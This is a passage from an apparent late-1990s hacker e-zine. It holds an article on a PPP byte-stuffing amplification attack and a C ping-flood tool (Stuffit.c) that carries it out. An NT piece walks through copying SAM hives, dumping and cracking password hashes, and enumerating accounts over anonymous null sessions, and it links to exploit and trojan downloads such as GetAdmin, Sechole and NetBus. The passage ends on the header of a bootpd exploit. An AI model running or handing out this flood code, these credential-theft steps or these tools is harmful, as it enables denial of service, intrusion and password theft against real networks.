disruptive effects on the end victim.
We can take an ordinary 500 byte ECHO_REQUEST packet and
using worst case overhead double its size when the end
victim recieves it.
--------
Brief overview of a PPP HDCL frame
I'm not going to go into a large discussion on why and how
PPP frames are created. If you would like to know more I'd
suggest reading RFC 1662 "PPP in HDCL-like framing"
PPP frames begin and end with the Flag Sequence, the binary
sequence 01111110 (hexidecimal, 0x7E), this value cannot be
inside of the PPP frame or . After this follows the
Address field, this will usually contain 11111111 (0xFF), the
All-Stations address. Control field follows the Address (Addr)
field, the Control (Cntrl) field usually contains the binary
value 00000011 (0x03). Next is the Protocol field which can
be 8 or 16 bits. This is used to identify what kind of
information is encapsulated within the PPP frame's
Information Field. For a listing of protocol values see RFC
1340 "Assigned Numbers". After the protocol field is the
Information (Info) Field, this is where the datagrams
of up to 1500 bytes in size are encapsulated in the PPP frame.
This is followed by the Frame Check Sequence used to verify
the frame's data was not corrupted. The final Flag Sequence
is then transmitted to end the PPP frame.
PPP Frame example:
| Flag | Addr | Ctrl | Protocol | Info | FCS | Flag |
| 0x7E | 0xFF | 0x03 | 8/16 bit | * | 16/32 bit | 0x7E |
After looking at the PPP frame you see that it begins and
ends with a 0x7E, and herein lies it's vulnerability.
There is a risk that within a packet you will find the value
0x7E, this could cause problems in that it may be mistaken for
the Flag Sequence that indicates the end of the PPP frame. To
eliminate this problem we introduce Byte-Stuffing.
--------
Explanation of Byte Stuffing
As explained in the PPP frame explanation there is a risk that
certain illegal values will end up in the information of a PPP
frame. To solve this problem byte-stuffing is used. In the
case of PPP frames the illegal value is changed to two bytes.
One is the value 01111101 (0x7D) the other is the illegal
character XOR'd with 0x20. In the case of 0x7E it will become
0x7D, 0x5E. This also makes any 0x7D which was not added by
the PPP daemon to be encoded in the same manner to avoid
corrupting valid data. What this means is that a single byte
(for example 0x7E) will be converted into a pair of bytes
(0x7D, 0x5E) but only when encapsulated in PPP frames.
If 4-bytes in the datagram are 0x7E then each of those 4-bytes
will be converted into the 0x7D, 0x5E pair. This results in
the 4-bytes being turned into 8-bytes when encapsulated in a
PPP frame. This added data is known as "overhead".
The implications of this is that maliciously engineered packets
could be made to exploit the byte-stuffing method and can
cause a worst case overhead of 100%. This means that a packet
could literally double in size when encapsulated in a PPP
frame. A 1024-byte ECHO_REQUEST could seem like 2048-bytes.
This means that an attacker requires half the bandwidth to
cause the same amount of disruption. This also means that if
an attacker is on a PPP connection and is attempting this
attack he will also find that he requires as much bandwidth to
transmit the packets as the victim requires to recieve them.
To test this idea all you need to do is send two packets, one
containing random data. The second containing only 0x7E.
or any of the following 0x7D, 0xFF all considered illegal
values in datagrams in a PPP frame.
Watch your ppp interface (for linux pppstats -w 1 is good)
and look at the number of bytes.
Below is the actual output of pppstats on my ppp interface
while I'm using linux's ping to send the two packets:
Regular packet using ping's random padding method:
created with: ping -c 1 -s 500 xxx.xxx.xxx.xxx
in pack comp uncomp err | out pack comp uncomp ip
0 1 0 0 0 | 537 1 0 0 1
Malicous packet padded with 0x7E
created with: ping -p 7e -c 1 -s 500 xxx.xxx.xxx.xxx
in pack comp uncomp err | out pack comp uncomp ip
0 1 0 0 0 | 1025 1 0 0 1
--------
Conclusion
Using this method attackers can lower the actual number of
bytes traveling from point A to point B but not actually
lose its effectiveness. Any device connecting with PPP
is possibly vulnerable to this specialized attack. But
this goes beyond simply PPP, any data-layer protocol which
uses byte-stuffing for illegal values would be vulnerable
to similar exploitation.
A paper I discovered while researching this attack describes
a way to prevent byte-stuffing attacks from being as effective.
"Consistent Overhead Byte Stuffing" by Stuart Cheshire and Mary
Baker. In it they present several ways to use more efficient
byte stuffing. You can download a copy at:
http://deathstar.stanford.edu/~cheshire/papers/COBS/
Noc-Wage -*- wage@idirect.ca
12/10/98
--------
Modified pingflood.c
pingflood.c was a program which showed a flaw in linux's ping
which allowed regular users to trick ping into flooding using
alert signals. I've modified it so that you can set the
illegal character it uses as well as the size of the packets
/*
Stuffit.c
Noc-Wage -*- wage@idirect.ca
12/12/98
This is just a modified version of:
pingflood.c by (AntireZ) Salvatore Sanfilippo <md5330@mclink.it>
enhanced by David Welton <davidw@cks.com>
I simply made it so that it will generate the ping packets so
that they contain 0x7e which is an illegal character in PPP
frames. I also made it so you could set the size of the packet
hopefully this came with my keen veracity article
but incase it didn't here is part of it so you understand why
this even exsists:
Explanation of Byte Stuffing
As explained in the PPP frame explanation there is a risk that
certain illegal values will end up in the information of a PPP
frame. To solve this problem byte-stuffing is used. In the
case of PPP frames the illegal value is changed to two bytes.
One is the value 01111101 (0x7D) the other is the illegal
character XOR'd with 0x20. In the case of 0x7E it will become
0x7D, 0x5E. This also makes any 0x7D which was not added by
the PPP daemon to be encoded in the same manner to avoid
corrupting valid data. What this means is that a single byte
(for example 0x7E) will be converted into a pair of bytes
(0x7D, 0x5E) but only when encapsulated in PPP frames.
If 4-bytes in the datagram are 0x7E then each of those 4-bytes
will be converted into the 0x7D, 0x5E pair. This results in
the 4-bytes being turned into 8-bytes when encapsulated in a
PPP frame. This added data is known as "overhead".
The implications of this is that maliciously engineered packets
could be made to exploit the byte-stuffing method and can
cause a worst case overhead of 100%. This means that a packet
could literally double in size when encapsulated in a PPP
frame. A 1024-byte ECHO_REQUEST could seem like 2048-bytes.
This means that an attacker requires half the bandwidth to
cause the same amount of disruption. This also means that if
an attacker is on a PPP connection and is attempting this
attack he will also find that he requires as much bandwidth to
transmit the packets as the victim requires to recieve them.
If you don't understand why this is a bad thing then don't
bother using this program because you'll most likely use
it ineffectively.
*/
#include <signal.h>
#define PING "/bin/ping"
main( int argc, char *argv[] )
{
int pid_ping;
if (argc < 3) {
printf("use: %s <hostname> <size> <illegal char> (I'd suggest 7e or 7d)\n", argv[0]);
exit(0);
}
if(!(pid_ping = fork()))
execl(PING, "ping", argv[1], "-s", argv[2], "-p", argv[3]);
if ( pid_ping <=0 ) {
printf("pid <= 0\n");
exit(1);
}
sleep (1); /* give it a second to start going */
while (1)
if ( kill(pid_ping, SIGALRM) )
exit(1);
}
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NT Security - Tips & Techniques Neathack
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GREETS TO YOU ALL MY BROTHERS/SISTERS FROM "NeaTHack or NtWaK0"
To me a hacker isn't just someone doing "illegal" things like cracking
other peoples passwords or breaking into some computer to steal
information. I think a hacker is everybody interested in experimenting
with computers or the telephone network.
Quote: "Any Grandma can call herself a hacker when she's able to program
her VCR"
I am glad to share with you some NT nice Administration Tips and technique.
Before getting into the heart I would like to introduce NT model and what
is NT DOMAIN about. That will allow you to get a least some idea what I am
going to talk about laterz.
The following M1cro$oft products can share their resources in workgroups:
· W1nd0wz for Workgroups
· W1nd0wz 95
· W1nd0wz NT Workstation
· W1nd0wz NT Server
Organizations that are large or that want more control over their networks
need something more than workgroups. Therefore, M1cro$oft has
incorporated the domain concept into W1nd0wz NT Server.
--Domains--
Domains borrow concepts from workgroups and from directory services. Like
workgroups, domains can be fairly informal and can be administered using a
mix of central and local controls. Domains can evolve fairly easily and
can be set up with less planning than typically is required for a directory.
Like a directory, a domain organizes the resources of several servers into
one administrative structure. Users are given logon privileges to a domain
rather than to each individual server. Because a domain controls the
resources of several servers, it is easier to administer than a network
with many stand-alone servers.
Servers within the domain advertise their services to users. Users who log
on to a domain gain access to all resources in the domain for which they
have been granted access. They can browse the resources in a domain much
as they would browse the resources in a workgroup; however, domains are
hosted by W1nd0wz NT Servers and can be made more secure than workgroups.
When networks become large enough to require several domains,
administrators can establish trust relationships among domains. Trust
relationships simplify administration because a user is required to have
an account in only one domain. Other domains that trust the user's logon
domain can rely on the logon domain to authenticate the user's logon.
W1nd0wz NT Server domains are not the same as domains found on TCP/IP
networks. TCP/IP domains are discussed in Chapter 16, "Using TCP/IP."
--Domains and Trust Relationships--
Domains are essentially improved workgroups. Access to domain resources is
controlled by a domain controller. The user is assigned a single domain
account and a password that is used to control access to all domain
resources. W1nd0wz NT Server domains also support the use of groups that
enable administrators to assign and change permissions for large numbers
of users more efficiently. You will learn about managing users and groups
in Chapter 11, "Managing Users and Groups."
--Domains and Domain Servers--
A server in a domain has one of three roles:
· One W1nd0wz NT Server stores the master copy of the domain's user
and group database. The PDC is responsible for synchronizing the
account database with all BDCs.
· Other W1nd0wz NT Servers can store backup copies of the domain's
user and group database.
· Servers can participate in a domain without being designated as
primary or backup domain controllers.
Each of these roles is described more fully in the following sections.
--The Primary Domain Controller--
The first W1nd0wz NT Server in the domain is configured as a primary
domain controller (PDC). The User Manager for Domains utility is used to
maintain user and group information for the domain. This information is
stored in a domain security database on the primary domain controller.
--Backup Domain Controllers--
Other W1nd0wz NT Servers in the domain can serve as backup domain
controllers (BDC). Each backup domain controller stores a replica of the
database on the primary domain controller, which is replicated
periodically to distribute changes made to the main database on the PDC.
Replication of the database has several advantages.
If the primary domain controller experiences a hardware failure, one of
the backup domain controllers can be promoted to the primary role. Having
one or more backup domain controllers builds a degree of fault tolerance
into your network. Each domain should have at least one BDC.
Backup domain controllers also can participate in the logon process. When
a user logs on to a domain, the logon request can be handled by any
primary or backup domain controller. This spreads the logon processing
load across the available servers and improves logon performance. This can
be an important benefit in domains with large numbers of users.
Changes cannot be made to the domain database unless the PDC is
functioning. If the PDC fails or is shut down for maintenance, you can
promote a BDC to function as the PDC.
Although the PDC is required to make changes to the domain database, other
domain operations are not dependent on the PDC. Users can log on to the
domain using a BDC if the PDC is unavailable.
--Servers--
Computers running W1nd0wz NT Server can also function as independent or
stand-alone servers, which may or may not participate in domains. The term
servers represents member server or stand-alone server. These servers do
not function as primary or backup domain controllers. They can take
advantage of the user and group databases, however, that are maintained
for a domain, and you can assign user and group permissions for the server
using the User Manager for Domains.
The server also can maintain its own database of users, and users can log
on to the server independently of the domain. When this is done, the
server cannot utilize the user and group database of a domain, and the
server handles accounts much like computers running W1nd0wz NT Workstation.
You might choose to configure a stand-alone W1nd0wz NT Member Server for
several reasons:
· The server can be administered by different staff members. Many
W1nd0wz NT Servers are used for application servers, such as SQL
databases. If you configure a database server as an independent
server, you can assign a member of your database staff as the
server administrator.
· Attending to logon requests can use a significant part of a
server's processing capability. If you configure the server as an
independent server, it can concentrate on servicing a single
function, such as providing application services.
· When a server is functioning as a primary or backup domain
controller, it is difficult to move the server to a new domain.
If there is a chance the server will move to a different domain,
configure it as an independent server.
--Domain Models--
Proper use of trust relationships enables organizations to build
enterprise networks that still require only a single logon procedure for
resource access. M1cro$oft has defined four models for domain trust
relationships. If you are configuring a multi-domain network, you will
want to consider the merits and disadvantages of each model.
There are two reasons for adding domains:
· For organizational reasons
· To improve network performance
Regarding network performance, you will find that M1cro$oft's descriptions
are a bit vague. You can use a single domain model, for example, "if your
network doesn't have too many users..." That doesn't give you much help
during the planning stages. Unfortunately, there are many variables, and
it is difficult to come up with a simple prescription for adding domains.
W1nd0wz NT Server can, after all, run on everything from an Intel 80486 PC
to a multiprocessor RISC system. Such a broad range of hardware makes
performance generalizations difficult. Fortunately, W1nd0wz NT Server
domains make it easy to reorganize the LAN as it grows.
The four domain models defined by M1cro$oft follow:
· Single domain
· Master domain
· Multiple-master domains
· Complete trust
A single domain network has several advantages:
· It is easier to manage because resources are centralized.
· No trust relationships are required.
· Group definitions are simpler.
You need to consider a multi-domain model in the following situations:
· If browsing is slow
· If too many users are degrading performance
· If your organization wants to assign domains to departments
· If you want to have some resources in their own domains
--The Master Domain Model--
The master domain model designates one domain to manage all user accounts.
The master domain also supports global groups. Global groups can export
group information to other domains. By defining global groups in the
master domain, other domains can import the group information easily
The master domain is named Keystone, and is managed centrally by the MIS
staff. All users are defined in Keystone, as well as some groups that will
make administration easier. Only the primary and backup domain controllers
in the Keystone domain are used to store user and group account information.
Because users cannot log on to the network without a working domain account
database, a master domain always should include at least one backup domain
controller in addition to the primary domain controller
When users log on to the network, they always log on to the Keystone
master domain. After they have logged on, they can access resources in
other domains that trust Keystone
--The Multiple Master Domain Model--
Each master domain supports about half the user accounts. This spreads the
processing of logons over several domains. Each domain supports some of
the groups that are accessed by the department domains.
Under this model, each master domain trusts every other master domain.
This is a convenience for administrators, but is necessary for users only
if they actually will be using resources on one of the master domains,
which is not ordinarily the case. To reduce the likelihood of security
holes, only administrators should be given permissions to access resources
in the master domains. Users should be given permissions only in the
department domains.
Each department domain trusts each master domain. It is not necessary for
department domains to trust each other
Because users are granted most privileges based on their memberships in
master domain groups, it is a good idea to group related users into the
same master domains. All your users in Accounting should log on to the
same master domain, for example. Otherwise, you are forced to establish
similar groups in each master domain. With more groups, it becomes far
more difficult to establish privileges in the department domains
The multiple master domain model has many desirable features:
· It is scalable to any organizational size.
· Security is managed centrally.
· Departments can manage their local domains, if desired.
· Related users, groups, and resources can be grouped logically into
domains.
Disadvantages of the multiple master domain model include the following
characteristics:
· The number of groups and trust relationships multiply rapidly as
the number of domains increases.
· User accounts and groups are not located in a single location,
complicating network documentation.
--The Complete Trust Model--
The master domain models assume that a central department exists that can
take responsibility for managing user and group security for the co
mplete
organization
In the complete trust model, every domain is configured to trust every
other domain. Users log in to their department domains and then access
resources in other departments by means of trust relationships.
As with the multiple master domain model, the number of trust
relationships required increases rapidly as domains increase. Three
domains require six trust relationships (two between each pair of domains),
whereas five domains require 20 trust relationships. If n is the number of
domains, then the network requires n ¥(n-1) trust relationships
If your organization does not have a central MIS department, networking is
a great reason for establishing one. Besides the need to maintain tight
security, several other functions are best when centralized. Here are some
examples:
· File backup
· Communications services
· E-mail maintenance
· Management of the network infrastructure (media, hubs, and so on)
Few departments have personnel who possess the expertise to do these jobs
well. Also, network management in a large organization calls for personnel
who are devoted completely to the task.
Therefore, I don't put much credibility into the advantages that M1cro$oft
attributes to the complete trust model, but here they are nevertheless:
· No central MIS department is required.
· The model scales to any organizational size.
· Departments retain control of their users and resources.
(But, it can be argued, they surrender that control by trusting
everybody.)
· Users and resources are grouped logically by departments
--Estimating Domain Capacity--
All the issues come down to the size of the file that is used to store the
Security Accounts Manager (SAM) domain database.
The size of the SAM database file matters because the entire database is
made resident in a domain controller's RAM. Large SAM databases have two
effects: they hog a lot of the domain controller's RAM, and they take a
long time to load, prolonging the process of booting the computer.
Three types of objects are stored in the SAM domain database:
· User accounts use 1,024 bytes (1 KB) each.
· Computer accounts use 512 bytes (0.5 KB) each (only W1nd0wz NT
computers require computer accounts).
· Global group accounts use 512 bytes plus 12 bytes per users.
· Local group accounts use 512 bytes plus 36 bytes per user.
Assume that you have 1,000 users and 500 NT computers that require
accounts. To organize the domain, you require 10 global groups with an
average membership of 200 users. You also require 10 local groups with an
average membership of 20. How large a SAM database would that generate?
1,000 users ¥ 1,024 bytes=1,024,000 bytes
512 computer accounts ¥ 512 bytes=262,144 bytes
10 global groups ¥ 512 bytes=5,120 bytes
2,000 global group members ¥ 12 bytes=24,000 bytes
10 local groups ¥ 512 bytes=5,120 bytes
200 local group members ¥ 36 bytes=7,200 bytes
Total SAM database size=1,324,589 bytes
The total size of the SAM database would be approximately 1.5 MB. That's
not particularly large as SAM databases go, and you can easily support
this network in a single domain.
Depending on its processing power and on the services it provides, a
domain controller can support between 2,000 and 5,000 users. A domain with
26,000 users, therefore, might require from 6 to 13 domain controllers to
ensure adequate performance
Now Let US do some NT Administration GOAL ONE:
Gain Access to the SAM
Users can gain access to the SAM and Security hives in several ways.
M1cro$oft says the best way to protect your NT systems is to protect the
administrator accounts, but administrators are not the only users who can
access the SAM and Security hives. Server operators, backup operators, and
even ordinary domain users can view and dump hash codes from the Registry.
Protecting administrator accounts is not enough.
By default, no user has the proper permissions to access or even view the
NT SAM. However, the SAM and Security hives are like other files. Users
who have permission to copy the Registry files--such as users who might
have to back up the Registry--can copy and manipulate these files on a
whim. If you log on as a backup operator, however, you can't just copy the
SAM and Security hives. The Registry is open while NT is running, and a
sharing violation occurs when you attempt to copy the files. However, the
Regback utility on the W1nd0wz NT resource kit CD-ROMs lets anyone in the
administrator, server operator, or backup operator local groups copy the
open Registry.
The list of potentially dangerous users, however, includes more than
these three groups. Regular domain users can invade NT security if NT is
on a FAT volume and they have permission to restart the machine. All they
have to do is boot to DOS, copy the SAM and Security hives from the
%SystemRoot%\System32\ config directory, and they're in business.
In general, if NT is on an NTFS volume, domain users can't boot DOS and
copy the hives. But NTFSDOS, a utility written by Mark Russinovich and
Bryce Cogswell, lets users mount the NTFS volumes in DOS.
(Mark Russinovich and Bryce Cogswell present one view of NTFSDOS and
Joel Sloss another view in point and counterpoint articles in the
September 1996 issue.) Run NTFSDOS, go to the %SystemRoot%\System32\config
directory, and copy the hives.
M1cro$oft says that true security is physical security. Following
M1cro$oft's advice, lock the machines away, and remove ordinary users'
permissions to restart the computers. If users can't restart the machines,
the possibility of rebooting to DOS on a FAT volume or using NTFSDOS is
no longer a threat.
Is NT secure now? Ordinary domain users can't copy the open Registry
because the action will cause a sharing violation. Nor can users back up
the system because they don't have permissions associated with
administrator, server operator, or backup operator accounts. But a
fundamental feature of NT's built-in availability is the Repair
directory. After a successful installation and each time you run the
Rdisk utility, NT stores a backup of the Registry in %SystemRoot%\Repair.
The backup files aren't open, and users can easily copy them if they can
log on locally or if the directory is shared. By default, the NTFS
permissions don't protect the Repair directory. All users have read
control, and read control offers enough permission to copy files.
For ordinary users to obtain the SAM hive that contains passwords, they
must access the current version of the Registry. The Registry is
vulnerable in at least two ways. First, even though NT doesn't back up the
Security and SAM hives by default when you run Rdisk, a copy of the SAM
from the original NT installation remains in the Repair directory. If the
administrator has not changed the administrative password since the
original installation, the password is at risk. Second, many
administrators use the rdisk /s command, which includes the Security and
SAM hives in a backup to an unprotected Repair directory (for more
information about the Rdisk utility, see Michael D. Reilly, "The Emergency
Repair Disk," January 1997).
In summary, here's how you can prevent an ordinary domain user from
gaining access to the SAM and Security hives on your servers:
* Don't permit local logon to servers.
* Use NTFS volumes instead of FAT volumes.
* Physically secure the servers.
* Change the default permissions of the Repair directory.
* Secure your Emergency Repair Disks and tape backups.
Remember, users can still access their local machine's Registry through
the Repair directory or an Emergency Repair Disk and attempt to crack the
local machine's administrator password. One way to prevent this attack is
to convert to NTFS and set more restrictive permissions on each
workstation's Repair folder.
GOAL TWO:
Dump the Hash Codes
Even after users have copies of the SAM and Security hives, they can't
easily view hash codes. They have to log on to an NT machine as
Administrator and dump the hash codes with PWDUMP. If they manually copy
both Registry files into their own Registry, NT will use the hijacked SAM.
Although users don't have administrative privileges at work, they are
administrators on their home PC. From their home PC, they can dump the
hash codes and, at their leisure, perform as many dictionary attacks as
they need to find the passwords.
To copy the hijacked SAM to a local Registry when NT is on a FAT volume,
users just boot to DOS and copy the file. If NT is on an NTFS volume,
users can use Regrest, another utility on the resource kit CD-ROMs.
However, the hives in the Repair directory or from an Emergency Repair
Disk are compressed, and a compressed Registry doesn't work in NT. But
the compression algorithm isn't difficult; you can easily uncompress
those files with the Expand command in %SystemRoot%\System32.
If users replace the SAM and attempt to log on as the hijacked
Administrator, they overwrite their personal administrative password and
don't know the new stolen password. However, the utility NT Locksmith,
available at http://www.winternals.com, lets you change the local
administrator password. Running this utility requires physical access to
the NT machine. Most people do not have physical access to servers at
work, but they have access to their home PC. After users change the
password, they can log on locally and dump the hash codes from the
hijacked SAM.
GOAL THREE:
Crack NT's Passwords
Once users have the hash codes, they can use NT Crack, L0phtCrack, or a
similar utility to perform a dictionary attack against NT.The outcome of
the password crack depends on the quality of the wordlist, or dictionary,
hackers use to perform the crack. The more words, dates, numbers, and
wordplays that are in the list--and the more complex they are--the better
the chance for a successful crack. Therefore, a good password security
policy greatly reduces the likelihood of a successful crack.
For good password security, you can prohibit blank passwords and require a
certain password length, for example a six-character minimum. Require
complex passwords, usually a random selection of letters and numbers. NT's
User Manager won't let you force complex passwords. However, you can set
all your users' passwords manually and not let users change them.
Now Let US have Fon with da SID.
Originally this was found by David LeBlanc and Dominique
Brezinski. Evgenii Borisovich Rudnyi pointed this out again.He wrote two
utilities, user2sid and sid2user, which are actually
command line interfaces to WIN32 functions, LookupAccountName
and LookupAccountSid. So, no hacking, just what is permitted by MS.
Now, it happens that to use these function a user have just to be
EVERYONE. It means that an ordinary user can find without a
problem a built-in domain administrator name, which MS recommends
us to rename from administrator to something else (see for
example, course 803, Administrating W1nd0wz NT 4.0). Assuming
that user's computer is in the domain, the task is solved by two
steps.
1) Looking up a SID of any domain account, for example Domain
Users
user2sid "domain users"
S-1-5-21-201642981-56263093-24269216-513
Now we know all the subauthorities for the current domain. All the
domain account SIDs are different by the last number only (so
called RID).
2) Looking up an built-in administrator name (RID is always 500)
sid2user 5 21 201642981 56263093 24269216 500
Name is SmallUser
Domain is DomainName
Type of SID is SidTypeUser
Now it is possible to look up all the domain accounts from the
very first one (RID = 1000 for the first account, 1001 for the
second and so on, RIDs are never used again for the current
installation).
sid2user 5 21 201642981 56263093 24269216 1000
sid2user 5 21 201642981 56263093 24269216 1001
...
It should be interesting for everyone to know the history of
developing the domain account database. Well, this is not the
end of the story. The anonymous logon is also in the EVERYONE
group. This means that actually it is possible to find out who is
a built-in administrator and to see the history of the SAM at any
domain into which you can run the anonymous session. Note that
anonymous sessions are not audited by logon/logoff category.
Below is an example of what you can learn provided the netbios
ports are open (the listing is fictional).
nslookup www.xyz.com
Non-authoritative answer:
Name: www.xyz.com
Address: 131.107.2.200
net use \\131.107.2.200\ipc$ "" /user:""
The command completed successfully.
user2sid \\131.107.2.200 "domain users"
S-1-5-21-201642981-56263093-24269216-513
Number of subauthorities is 5
Domain is XYZ_domain
Length of SID in memory is 28 bytes
Type of SID is SidTypeGroup
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 500
Name is XYZAdmin
Domain is XYZ_domain
Type of SID is SidTypeUser
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1000
Name is
Domain is XYZ_domain
Type of SID is SidTypeDeletedAccount
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1001
Name is Simpson
Domain is XYZ_domain
Type of SID is SidTypeUser
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1112
LookupSidName failed - no such account
For those who would like to try it, the utilities can be found at:
http://www.ntbugtraq.com
and follow the links to the new downloads page where you'll find
his usage page with a link to the zip.
SOLUTION
SP3 does not prevent this to happen. At this time, there is no
fix for this, except to filter connections to port 139. So, at
the moment, if you can get a null session, you can dump all the
users, groups, and machine accounts.
Linkz and Ulilities Needed?
I will include the utilities needed to administer --:) NT
PWDUMP > http://www.geocities.com/CapitolHill/7237/pwdump.zip
NTFSDOS > http://www.geocities.com/CapitolHill/7237/ntfs130.zip
LOPHTCRACKER > http://www.geocities.com/CapitolHill/7237/lc15-li.zip
ftp://ftp.technotronic.com/M1cro$oft/lc201exe.zip
NT Security/Unsecurity > http://www.ntsecurity.net/
BUGTRAG Archive > http://www.geek-girl.com/bugtraq/search.html
C2MYAZZ SMB Downgrade
When a M1cro$oft networking client creates a new connection to an NT
Server, it is possible for another computer on the same physical network
to `spoof' the M1cro$oft client into sending a clear-text password to the
NT Server, bypassing all password encryption and allowing the client's
clear-text password to be discovered by any other device on the same
physical network. his program actually runs on a W1nd0wz based system
loaded with Novell ODI style drivers running in promiscuous mode. Once
active, the software listens for SMB negotiations, and upon detecting
one, the software sends a single packet to the client instructing it to
downgrade its connection attempt to a clear text level - at which point
the client silently obeys by sending its password in clear readable text.
Once this happens this little piece of software actually grabs the
password as it travels over the wire and displays it on the screen. The
client is successfully connected to the NT Server, and the user remains
none-the-wiser that its password has just been grabbed
ftp://ftp.technotronic.com/M1cro$oft/c2myazz.zip
l0pthcrack 2.01 Challenge / Response Exploit
PPTP sniffer for Solaris PPTP sniffer works with any unix that has
libpcap. This program also contains an active attack which exploits a
MS-CHAP problem to retrieve the LANMAN and NT password hashes without the
extra layer of encryption of the challenge/response. This makes password
cracking much quicker.
W1nd0wz NT supports the following two types of challenge/response
authentication:
- LanManager (LM) challenge/response
- W1nd0wz NT challenge/response
To allow access to servers that only support LM authentication, W1nd0wz
NT clients currently send both authentication types. Here is a description
of the challenge that takes place over the network when a client, such as
a W1nd0wz 95 machine, connects to an NT Server
ftp://ftp.technotronic.com/M1cro$oft/lc201exe.zip
GETADMIN
Getadmin.exe works because of a problem in a low-level kernel routine
that causes a global flag to be set which allows calls to
NtOpenProcessToken to succeed regardless of the current users permissions.
This in turn allows a user to attach to any process running on the system,
including a process running in the system's security context, such as
WinLogon. Once attached to such a process, a thread can be started in the
security context of the process. In the specific case of GetAdmin, it
attaches to the WinLogon process, which is running in the system's
security context, and makes standard API calls that add the specified
user to the administrators group. It is important to note that any account
which has been granted the rights to "Debug Programs" will always be able
to run Getadmin.exe successfully, even after the application of the hotfix.
This is because the "Debug Programs" right allows a user to attach to any
process. The "Debug Programs" right is initially granted to Administrators
and should be only granted to fully trusted users. Also, if Getadmin.exe
is run with an account that is already a member of the administrators
local group, it will still work (even after applying the hotfix). This is
by design. Members of the administrators group always have the rights to
make the calls GetAdmin needs in order to succeed
ftp://ftp.technotronic.com/M1cro$oft/getadmin.zip
SECHOLE
Sechole.exe allows a non-administrative user to gain debug-level access
on a system process. Using this utility, the non-administrative user is
able to run some code in the system security context and thereby grant
himself for herself local administrative privileges on the system.
Sechole.exe locates the memory address of a particular API function
(OpenProcess) and modifies the instructions at that address in a running
image of the exploit program on the local system. Sechole.exe requests
debug rights that gives it elevated privileges. The request is successful
because the access check for this right is expected to be done in the API
that was successfully modified by the exploit program. Sechole.exe can now
add the user who invoked Sechole.exe to the local Administrators group
ftp://ftp.technotronic.com/M1cro$oft/sechole2.zip
NetBus 1.60 Similar in functionality to Back Orifice. Works under NT too.
Cleaner 1.9c This program will clean up several trojans and has the
potential to clean up after any trojan attack
ftp://ftp.technotronic.com/M1cro$oft/netbus.zip
ftp://ftp.technotronic.com/M1cro$oft/cleaner19c.zip
NTFSDOS v2.0 Allows you to boot a DOS diskette and READ an NTFS Partition
ftp://ftp.technotronic.com/M1cro$oft/ntfs20r.zip
Linux NTFS Driver NT secured filesystem (NTFS) can be read from Linux,
bypassing filesystem security
ftp://ftp.technotronic.com/M1cro$oft/ntfs-970312_tar.gz
My Personal Feelings
I feel as though we should learn to coexist and compromise with hackers.
As long as there are computers, there will be hackers.
NeatHack....
e\\\_a_///t
\\ - - //H
N( @ @ )acK
+---------------oOOo-(_)-oOOo--------------------------------------+
|"Kn0w13dg3 i5 0n1y p0w3r if U hav3 th3 wi5d0m t0 us3 i7 c0rr3c71y"|
|"I7'5 nic3 70 b3 imp0r7an7. Bu7 i7'5 m0r3 imp0r7an7 70 b3 nic3" |
+------------------------Oooo--------------------------------------+
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Rootfest 99 Defiant/Lothos
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Rootfest 99 Details
Rootfest is a computer security convention and conference being held in
Minneapolis, MN. May 21-23 1999 As far as I know, it's the first of it's
kind in the whole Midwest. It will be composed of many speakers, vendors,
contests, events and door prizes. We welcome all computer security
professionals, the computer underground, IT professionals, government
agents, feds, and anyone who would like to come and learn about computer
security. We've got a while variety of speakers lined up already and we
are still in the process of adding more.
Speakers
We currently have numerous speakers lined up for rootfest and we would
like to be able to add to the list. If you would like to speak please
contact lothos via e-mail, lothos@trifid.net.
Bruce Schiener
Topic: Topic to be announced.
Credentials: He is a published author of Applied Cryptography and also the
president of Counterplane Systems.
Steve Stakton aka Optiklenz
Topic: Cisco PIX Firewall Security Analysis
Credentials: Founder of Legions Interactive and LoU. He has accomplished
much in his time as an Underground Researcher.
Adam L. Beberg
Topic: V3 Security(Tenative)
Credentials: Distributed.net founder, The worlds largest computer.
Konceptor
Topic: Monitoring IRC, evading capture, Naval Surface Warfare Center.
Credentials: US Hacker.
Mike Roadancer
Topic: "Hacker - It's not a dirty word" Hackers in the workplace,
Credentials: Founder, Hackers Defence Foundation.
Brain Ristuccia
Topic: Ideas on Internet censorship
Credentials: Bay Networks contractor
Paul McNabb
Topic: Trusted Operating Systems Technology in Web-based computing
Credentials: CTO of Argus Systems Group, Inc.
Brenno J.S.A.A.F de Winter
Topic: Internet Security in Europe - State of Affairs.
Credentials: Netherlands Hacker.
DataShark
Topic: Tempest Monitoring and Protection
Credentials: Systems Administration and Hacker.
Richard Thieme
Topic: Actionable Intelligence: Beyond Trophy-Hacking to Playing for Big
Stakes.
Credentials: Black Hat keynote speaker, Defcon 4,5,6 speaker.
To close I would like to thanks everyone that is supporting me and the
rest of the rootfest team. We are still in the process of finalising more
details such as events like hack the flag and also adding more speakers to
our already impressive list.
If you would like to contact me further regarding rootfest please check
out http://www.rootfest.org or feel free to e-mail me lothos@trifid.net.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bootpd Exploit Broken ass code Revamped by Bronc
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/*
* Bootpd Exploit against debian linux 1.3 and 2.0 and possibly other
*
* (C) 1998 Willem Pinckaers W.H.J.Pinckaers@cpedu.rug.nl
*
*
* Broken ass code fixed by Bronc Buster - Dec 1998
*
* If you get this and it's missing the two .h files
* just forget it (unless you are lucky and have them already)
* Anyone with half a brain could of fixed this to work, so if
* you are using this now, either I gave it to you, or you are
* a k0d3 kIdDi3 ;)
*
* to complie: gcc bootpd.c -o bootp
*
*/
